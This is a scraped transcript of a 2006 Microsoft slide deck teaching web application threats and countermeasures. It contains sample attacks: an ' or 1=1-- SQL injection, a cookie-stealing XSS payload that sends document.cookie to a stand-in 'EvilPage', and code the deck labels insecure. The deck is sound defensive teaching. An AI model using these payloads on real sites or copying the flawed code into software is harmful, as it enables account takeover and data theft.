Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to...
Transcript of Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to...
![Page 1: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/1.jpg)
Security:Threats and Countermeasures
Stanley TanAcademic Program ManagerMicrosoft Singapore
![Page 2: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/2.jpg)
Session Agenda
Types of threats
Threats against the application
Countermeasures against the threats
![Page 3: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/3.jpg)
Types of Threats
Spoofed packets, etc.
Buffer overflows, illicit paths, etc.
SQL injection, XSS, input tampering, etc.
Network Host Application
Threats against
the network
Threats against the host
Threats against the application
![Page 4: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/4.jpg)
Threats Against the Application
Threat Examples
SQL injection Including a DROP TABLE command in text typed into an input field
Cross-site scripting Using malicious client-side script to steal cookies
Hidden-field tampering
Maliciously changing the value of a hidden field
Eavesdropping Using a packet sniffer to steal passwords and cookies from traffic on unencrypted connections
Session hijacking Using a stolen session ID cookie to access someone else's session state
Identity spoofing Using a stolen forms authentication cookie to pose as another user
Information disclosure
Allowing client to see a stack trace when an unhandled exception occurs
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh10.asp?
frame=true#c10618429_004i
![Page 5: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/5.jpg)
SQL Injection
Exploits applications that use external input in database commands
Input from <form> fields
Input from query strings
The technique:
Find a <form> field or query string parameter used to generate SQL commands
Submit input that modifies the commands
Compromise, corrupt, and destroy data
![Page 6: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/6.jpg)
SQL Injection
![Page 7: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/7.jpg)
How SQL Injection Works
SELECT COUNT (*) FROM UsersWHERE UserName=„Jeff‟AND Password=„imbatman‟
SELECT COUNT (*) FROM UsersWHERE UserName=„‟ or 1=1--AND Password=„‟
Model Query
Malicious Query
"or 1=1" matches every
record in the table"--" comments out the
remainder of the query
![Page 8: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/8.jpg)
Accessing Data Securely
Use stored procedures or parameterized
commands in lieu of dynamic SQL commands
Never use sa to access Web databases
Store connection strings securely
Optionally use SSL/TLS or IPSec to secure the
connection to the database server 2,9
Apply administrative protections to SQL Server 8
i http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh14.asp
![Page 9: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/9.jpg)
Dynamic SQL Commands
// DANGER! User input used to generate database query
string sql = String.Format ("select count (*) " +"from users where username=\'{0}\' and cast " +"(password as varbinary)=cast (\'{1}\' as " +varbinary)", username, password);
SqlCommand command = new SqlCommand (sql, connection);int count = (int) command.ExecuteScalar ();
Vulnerable to SQL injection attacks
![Page 10: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/10.jpg)
Parameterized Commands
// BETTER: Input passed to parameterized command
SqlCommand command = new SqlCommand("select count (*) from users where " +"username=@username and cast (password as " +"varbinary)=cast (@password as varbinary)",connection);
command.Parameters.Add ("@username",SqlDbType.VarChar).Value = username;
command.Parameters.Add ("@password",SqlDbType.VarChar).Value = password;
int count = (int) command.ExecuteScalar ();
Less vulnerable to SQL injection attacks
![Page 11: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/11.jpg)
YASID
Why you really want to secure yourself against SQL injection attacks
![Page 12: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/12.jpg)
Cross-Site Scripting (XSS)
Exploits applications that echo raw, unfiltered input to Web pages
Input from <form> fields
Input from query strings
The technique:
Find a <form> field or query string parameter whose value is echoed to the Web page
Enter malicious script and get an unwary user to navigate to the infected page
Steal cookies, deface and disable sites
![Page 13: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/13.jpg)
How Cross-Site Scripting Works
<a href="http://…/Search.aspx?Search=<script language='javascript'>document.location.replace('http://localhost/EvilPage.aspx?Cookie=„ + document.cookie);</script>">…</a>
Query string contains embedded JavaScript that
redirects to attacker’s page and transmits cookies
issued by Search.aspx in a query string
URL of the site targeted by the attack
![Page 14: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/14.jpg)
Cross-Site Scripting
![Page 15: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/15.jpg)
Validating Input
Filter potentially injurious characters and strings
HTML-encode all input echoed to a Web page
Avoid using file names as input if possible
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh10.asp?
frame=true#c10618429_006i
Use "safe" character encodings
<globalization requestEncoding="ISO-8859-1"responseEncoding="ISO-8859-1" />
![Page 16: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/16.jpg)
Anti-XSS Library
Download from MSDN:
http://www.microsoft.com/downloads/details.aspx?familyid=9A2B9C92-7AD9-496C-9A89-AF08DE2E5982&displaylang=en
The Anti-Cross Site Scripting Library can be used to provide comprehensive protection to Web-based applications against Cross-Site Scripting (XSS) attacks.
![Page 17: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/17.jpg)
Input Validation
Why you shouldn’t use file names as input…
![Page 18: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/18.jpg)
Hidden-Field Tampering
HTTP is a stateless protocol
No built-in way to persist data from one request to the next
People are stateful beings
Want data persisted between requests
Shopping carts, user preferences, etc.
Web developers sometimes use hidden fields to persist data between requests
Hidden fields are not really hidden!
![Page 19: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/19.jpg)
How HF Tampering Works
<input type=“hidden” name="price"value="$10,000">
Page contains this…
Postback data should contain this…
price="$10,000"
Instead it contains this…
price="$1"
type="hidden" prevents the field
from being seen on the page but
not in View Source
![Page 20: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/20.jpg)
Information Disclosure
Which is the
better error
message?
![Page 21: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/21.jpg)
Information Disclosure
![Page 22: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/22.jpg)
This is Insecure Code!<html>
<body><form runat="server">
<asp:TextBox ID="Input" runat="server" /><asp:Button Text="Click Me" OnClick="OnSubmit"
runat="server" /><asp:Label ID="Output" runat="server" />
</form></body>
</html>
<script language="C#" runat="server">void OnSubmit (Object sender, EventArgs e){
Output.Text = "Hello, " + Input.Text;}</script>
![Page 23: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/23.jpg)
Why is This Code Insecure?
<html><body>
<form runat="server"><asp:TextBox ID="Input" runat="server" /><asp:Button Text="Click Me" OnClick="OnSubmit"
runat="server" /><asp:Label ID="Output" runat="server" />
</form></body>
</html>
<script language="C#" runat="server">void OnSubmit (Object sender, EventArgs e){
Output.Text = "Hello, " + Input.Text;}</script>
Input is echoed to page
without HTML encoding
Input is neither validated nor
constrained; user can type anything!
![Page 24: Threats and Threat Modeling€¦ · Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field](https://reader035.fdocuments.us/reader035/viewer/2022062604/5f8438ebc5ff795841476055/html5/thumbnails/24.jpg)
© 2006 Microsoft Corporation. All rights reserved.This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.